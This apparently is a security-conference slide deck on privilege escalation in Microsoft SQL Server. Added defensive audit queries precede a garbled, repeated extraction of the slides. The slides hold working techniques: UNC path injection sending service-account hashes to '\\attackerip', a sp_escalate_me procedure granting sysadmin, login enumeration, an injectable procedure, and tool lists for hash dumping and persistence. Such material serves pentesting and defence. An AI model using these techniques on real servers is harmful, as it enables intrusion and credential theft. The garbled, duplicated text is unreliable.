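An added audit query, not from the slides or PowerUpSQL, for the point the diagram makes: it shows which Windows account runs each service of the instance and which logins hold sysadmin, so a reviewer can see whether a domain account is doing both and can then check whether that same account runs other instances. It relies on sys.dm_server_services, which exists from SQL Server 2008 R2 SP1 onwards.

```sql
-- Added example (not from the slides or PowerUpSQL): service account review.
-- Needs VIEW SERVER STATE; sys.dm_server_services exists from 2008 R2 SP1.
SELECT
    servicename,
    service_account,
    CASE
        WHEN service_account LIKE 'NT SERVICE\%'
          OR service_account LIKE 'NT AUTHORITY\%'
          OR service_account = 'LocalSystem'
        THEN 'built-in or virtual account (local to this host)'
        WHEN service_account LIKE '%\%'
        THEN 'domain or local user account: check whether it runs other instances too'
        ELSE 'unknown'
    END AS account_scope,
    startup_type_desc,
    status_desc
FROM sys.dm_server_services;

-- Who holds sysadmin on this instance. On 2012 and later the service normally
-- gets sysadmin through its per-service SID (NT SERVICE\MSSQLSERVER). If the
-- domain service account itself is listed, sysadmin is bound to a credential
-- that may be shared across servers, which is the case the slide warns about.
SELECT m.name AS member_login, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals  AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals  AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;
```

Run across an estate, the first query is what turns "one account to rule them all" into a list: group the results by service_account and every account that appears on more than one host is a single credential whose compromise on the weakest server reaches all the others.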
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@VERSION')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Diagram: Leveraging MS SQL Database links. Same zones and hosts as the previous diagram (Internet, DMZ, Intranet; LRA, HVA, LVAs, ADS; ports 80 and 443, ports 1433 and 1434). Steps shown for "Captain Evil": (1) SQL injection against the LVA's database DB1; DB1 has a DB link with least privileges to the next server, which in turn has a DB link with the SA account; (2) execute SQL queries and local commands on database servers via nested linked servers, reaching the HVA. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql
Escalating Privileges: Crawling Server Links
Function: Description
Get-SQLServerLink: Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
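An added T-SQL audit, not from the slides and not PowerUpSQL's Get-SQLServerLink: it lists every linked server together with its login mapping, so a reviewer can spot the configuration the diagram calls "DB link with SA account", a single fixed remote login applied to all local logins, which is exactly what lets the public role run queries on the remote side under that account. The linked server name SQLSERVER2 is taken from the OPENQUERY example; the login names in the remediation lines are hypothetical.

```sql
-- Added example (not from the slides or PowerUpSQL): linked server login review.
SELECT
    s.name                      AS linked_server,
    s.data_source,
    s.provider,
    s.is_rpc_out_enabled,                       -- 1 lets callers EXEC procedures remotely
    s.is_data_access_enabled,                   -- 1 lets callers use OPENQUERY
    CASE ll.local_principal_id
        WHEN 0 THEN '<all local logins>'        -- the default mapping, which includes public
        ELSE SUSER_NAME(ll.local_principal_id)
    END                         AS local_login,
    ll.uses_self_credential,                    -- 1 = pass the caller's own credential through
    ll.remote_name,                             -- fixed remote login, if any
    CASE
        WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
            THEN 'REVIEW: every local login reaches ' + s.name + ' as ' + ll.remote_name
        WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 1
            THEN 'pass-through: remote rights equal the caller''s own'
        WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0 AND ll.remote_name IS NULL
            THEN 'unmapped logins cannot use this link'
        ELSE 'explicit per-login mapping'
    END                         AS assessment
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation for the REVIEW case: drop the catch-all mapping so unmapped
-- logins cannot use the link at all, then map only the logins that need it
-- to a remote login with the least rights that still do the job.
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @locallogin = NULL;
-- EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'SQLSERVER2', @useself = N'FALSE',
--                            @locallogin = N'AppReportingLogin',
--                            @rmtuser = N'reporting_reader', @rmtpassword = N'<placeholder>';
```

Repeating this query on each server the links point at is the defender's version of the crawl: a chain is only as strong as the weakest mapping in it, and a least-privilege link on the first hop does not help if the second hop maps everyone to sa, which is the situation the diagram draws.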
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary...
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin - Here are some tool options
Approach: Common Tools
Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
Single User Mode: DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
• SQL Server layer: startup procedures, agent jobs, triggers, modified code
• OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
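The "Identify Sensitive Data" step above, as an added example that is not from the slides or PowerUpSQL: a keyword pass over column names, then a Luhn validator applied to samples from the columns it finds. The same two passes are what a data classification or DLP review runs to find card numbers that were never supposed to be stored. The function name dbo.fn_IsLuhnValid and the keyword list are hypothetical, and the #sample table is constructed.

```sql
-- Added example (not from the slides or PowerUpSQL): sensitive data discovery
-- in two passes, a keyword match on column names, then a Luhn check on samples.
-- dbo.fn_IsLuhnValid and the keyword list are hypothetical; #sample is constructed.

-- Pass 1: columns whose names suggest card numbers or national IDs.
SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME, c.DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS AS c
WHERE c.COLUMN_NAME LIKE '%card%'
   OR c.COLUMN_NAME LIKE '%ccn%'
   OR c.COLUMN_NAME LIKE '%pan%'
   OR c.COLUMN_NAME LIKE '%ssn%'
   OR c.COLUMN_NAME LIKE '%account%'
ORDER BY c.TABLE_SCHEMA, c.TABLE_NAME;
GO

-- Pass 2: a Luhn validator to test samples taken from the columns found above.
CREATE FUNCTION dbo.fn_IsLuhnValid (@input varchar(64))
RETURNS bit
AS
BEGIN
    -- Keep digits only, so '4111 1111 1111 1111' and '4111-1111-1111-1111' both work.
    DECLARE @digits varchar(64) = '', @i int = 1;
    WHILE @i <= LEN(@input)
    BEGIN
        IF SUBSTRING(@input, @i, 1) LIKE '[0-9]'
            SET @digits = @digits + SUBSTRING(@input, @i, 1);
        SET @i = @i + 1;
    END;

    -- Payment card numbers are 13 to 19 digits; anything else is not a candidate.
    IF LEN(@digits) < 13 OR LEN(@digits) > 19 RETURN 0;

    -- Luhn: from the right, double every second digit, subtract 9 if > 9, sum,
    -- and the number is well formed when the sum is a multiple of 10.
    DECLARE @sum int = 0, @pos int = LEN(@digits), @double bit = 0, @d int;
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END;
        SET @sum = @sum + @d;
        SET @double = CASE WHEN @double = 1 THEN 0 ELSE 1 END;
        SET @pos = @pos - 1;
    END;

    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO

-- Constructed sample: the well-known Visa test number, the same number with a
-- wrong check digit, a 16-digit number that fails Luhn, and free text.
-- Expected luhn_ok: 1, 0, 0, 0.
CREATE TABLE #sample (id int, val varchar(64));
INSERT INTO #sample VALUES
    (1, '4111 1111 1111 1111'),
    (2, '4111111111111112'),
    (3, '1234567890123456'),
    (4, 'order ref 2016-11');
SELECT id, val, dbo.fn_IsLuhnValid(val) AS luhn_ok FROM #sample;
DROP TABLE #sample;
GO
```

A Luhn pass produces false positives (many 16-digit identifiers happen to validate), so in practice it is applied to a small TOP (n) sample per candidate column and the hit rate, not a single hit, decides whether the column is escalated for review.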
2. Get the principal ID for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just the principal ID
4. Increment the number and repeat
select n [id], SUSER_NAME(n) [user_name]
from ( select top 10000 row_number() over(order by t1.number) as N
       from master..spt_values t1 cross join master..spt_values t2) a
where SUSER_NAME(n) is not null
Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
3. Grab the first 48 bytes of the full RID
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation - Stored Procedure and Trigger Creation Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation - Stored Procedure and Trigger Creation Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO
SYSADMIN is often the OWNER
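An added audit, not from the slides or PowerUpSQL, for the two bullets above: it finds databases that are both TRUSTWORTHY and owned by a sysadmin, the combination under which a db_owner's EXECUTE AS OWNER module such as sp_escalate_me reaches sysadmin, then lists the modules inside a database that run as OWNER or as a named user, and finishes with the two settings that close the gap. MyAppDb is the database from the slide; MyAppDbOwner is a hypothetical low-privilege login.

```sql
-- Added example (not from the slides or PowerUpSQL): find the preconditions for
-- the sp_escalate_me pattern. MyAppDbOwner is a hypothetical name.

-- 1. Databases marked TRUSTWORTHY whose owner holds sysadmin. msdb is
--    TRUSTWORTHY by design and is excluded; anything else returned is a finding.
SELECT d.name,
       SUSER_SNAME(d.owner_sid)                                AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid))  AS owner_is_sysadmin,
       d.is_db_chaining_on     -- cross-database ownership chaining widens the same problem
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb'
ORDER BY owner_is_sysadmin DESC, d.name;

-- 2. Inside a given database: modules declared WITH EXECUTE AS OWNER
--    (execute_as_principal_id = -2) or WITH EXECUTE AS 'some_user'.
--    NULL means EXECUTE AS CALLER, the default, and is not listed.
USE MyAppDb;
GO
SELECT OBJECT_SCHEMA_NAME(m.object_id) + '.' + OBJECT_NAME(m.object_id) AS module_name,
       o.type_desc,
       CASE m.execute_as_principal_id
            WHEN -2 THEN 'OWNER'
            ELSE USER_NAME(m.execute_as_principal_id)
       END AS runs_as
FROM sys.sql_modules AS m
JOIN sys.objects     AS o ON o.object_id = m.object_id
WHERE m.execute_as_principal_id IS NOT NULL
ORDER BY module_name;

-- 3. Closing the gap: own the database with a login that holds no server role,
--    and keep TRUSTWORTHY off unless a documented feature needs it. With both in
--    place, EXECUTE AS OWNER still works for database-scoped work but can no
--    longer reach server-level rights such as sp_addsrvrolemember.
-- ALTER AUTHORIZATION ON DATABASE::MyAppDb TO MyAppDbOwner;
-- ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF;
```

The first query is the one worth scheduling: a database restored from another environment arrives with whatever owner SID it had there, and a DBA who restores it while logged in as a sysadmin becomes its owner, which is how "SYSADMIN is often the OWNER" comes about without anyone deciding it.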
Escalating Privileges: Impersonation - Stored Procedure and Trigger Creation Injection Issues
• Use signed procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
